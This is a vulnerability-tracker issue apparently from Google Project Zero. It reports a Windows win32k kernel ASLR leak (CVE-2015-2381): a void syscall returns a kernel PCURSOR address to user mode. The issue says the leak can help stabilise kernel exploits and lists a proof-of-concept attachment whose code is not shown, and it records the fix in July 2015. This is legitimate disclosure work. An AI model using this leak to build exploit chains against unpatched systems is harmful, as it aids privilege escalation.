New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Issue 390
Starred by 3 users
Status: Fixed
Owner:
matttait@google.com
Email to this user bounced
Closed: Aug 2015
Cc:
project-...@google.com



Sign in to add a comment
 Kernel ASLR leak in win32k!zzzHideCursorNoCapture (via NtUserCallNoParam)
Reported by matttait@google.com, May 18 2015 Back to list 
When calling the Win32k system call win32k!zzzHideCursorNoCapture (via NtUserCallNoParam), the return value of the function leaks a kernel-mode address to user-mode.

This function returns type void, and so RAX - which holds the kernel-mode address of a PCURSOR object in kernel memory - is inappropriately returned to usermode.

This vulnerability gives local attackers the ability to de-ASLR the kernel from any permission level, and could be used to stabilize a local kernel-mode read/write vulnerability as part of a kernel-mode exploit.

Labels:
Vendor-Microsoft
Product-Windows-Kernel
Severity-Medium
PublicOn-? (e.g. PublicOn-2014-Jul-26)
Finder-MattTait
Reported-2015-May-19

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
KASLRLeak-Release.c
1.8 KB Download
Comment 1 by matttait@google.com, Jun 16 2015
Summary: Kernel ASLR leak in win32k!zzzHideCursorNoCapture (via NtUserCallNoParam) (was: Kernel ASLR leak in NtUserNoParam)
Assigned MSRC case number MS-30380
Comment 2 by matttait@google.com, Jul 10 2015 
Assigned MSRC case 30380

Fixed in July 2015 Patch Tuesday
Project Member Comment 3 by hawkes@google.com, Aug 12 2015
Labels: -Restrict-View-Commit
Status: Fixed
Project Member Comment 4 by mjurczyk@google.com, Aug 12 2015
Labels: MSRC-30380 CVE-2015-2381 Fixed-14-Jul-2015
Project Member Comment 5 by mjurczyk@google.com, Aug 12 2015
Labels: -Fixed-14-Jul-2015 Fixed-2015-Jul-14
Sign in to add a comment